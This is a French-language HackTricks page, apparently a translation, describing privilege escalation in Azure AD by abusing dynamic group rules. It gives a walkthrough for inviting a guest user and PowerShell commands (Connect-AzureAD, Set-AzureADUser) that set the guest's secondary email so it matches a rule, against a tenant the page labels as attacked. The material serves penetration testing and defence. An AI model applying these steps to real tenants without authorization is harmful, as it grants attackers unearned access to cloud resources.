Az - Dynamic Groups Privesc

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert Red Team AWS HackTricks)!

Autres façons de soutenir HackTricks :

Informations de base

Les groupes dynamiques sont des groupes qui ont un ensemble de règles configurées et tous les utilisateurs ou appareils qui correspondent aux règles sont ajoutés au groupe. Chaque fois qu'un attribut d'utilisateur ou d'appareil est modifié, les règles dynamiques sont réexaminées. Et lorsqu'une nouvelle règle est créée, tous les appareils et utilisateurs sont vérifiés.

Les groupes dynamiques peuvent se voir attribuer des rôles Azure RBAC, mais il n'est pas possible d'ajouter des rôles AzureAD aux groupes dynamiques.

Cette fonctionnalité nécessite une licence Azure AD Premium P1.

Élévation de privilèges

Notez qu'en principe, tout utilisateur peut inviter des invités dans Azure AD, donc, si une règle de groupe dynamique donne des autorisations aux utilisateurs en fonction des attributs qui peuvent être définis dans un nouvel invité, il est possible de créer un invité avec ces attributs et d'élever les privilèges. Il est également possible pour un invité de gérer son propre profil et de modifier ces attributs.

Obtenez les groupes autorisant l'adhésion dynamique : Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}

Exemple

  • Exemple de règle : (user.otherMails -any (_ -contains "tester")) -and (user.userType -eq "guest")

  • Description de la règle : Tout utilisateur invité avec un email secondaire contenant la chaîne 'tester' sera ajouté au groupe

  1. Allez dans Azure Active Directory -> Utilisateurs et cliquez sur Voulez-vous revenir à l'expérience de liste d'utilisateurs héritée ? Cliquez ici pour quitter l'aperçu

  2. Cliquez sur Nouvel utilisateur invité et invitez un email

  3. Le profil de l'utilisateur sera ajouté à Azure AD dès l'envoi de l'invitation. Ouvrez le profil de l'utilisateur et cliquez sur (gérer) sous Invitation acceptée.

  1. Changez Renvoyer l'invitation ? en Oui et vous obtiendrez une URL d'invitation :

  1. Copiez l'URL et ouvrez la, connectez-vous en tant qu'utilisateur invité et acceptez l'invitation

  2. Connectez-vous dans le cli en tant qu'utilisateur et définissez l'email secondaire

# Connexion
$password = ConvertTo-SecureString 'mot_de_passe' - AsPlainText -Force
$creds = New-Object
System.Management.Automation.PSCredential('externaltester@somedomain.onmicrosoft.com', $Password)
Connect-AzureAD -Credential $creds -TenantId <ID_DU_LOCATAIRE_DU_DOMAINE_ATTAQUÉ>

# Changer le paramètre OtherMails
Set-AzureADUser -ObjectId <ID_OBJET> -OtherMails <Nom_utilisateur>@<NOM_DU_LOCATAIRE>.onmicrosoft.com -Verbose

Références

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert Red Team AWS HackTricks)!

Autres façons de soutenir HackTricks :

Dernière mise à jour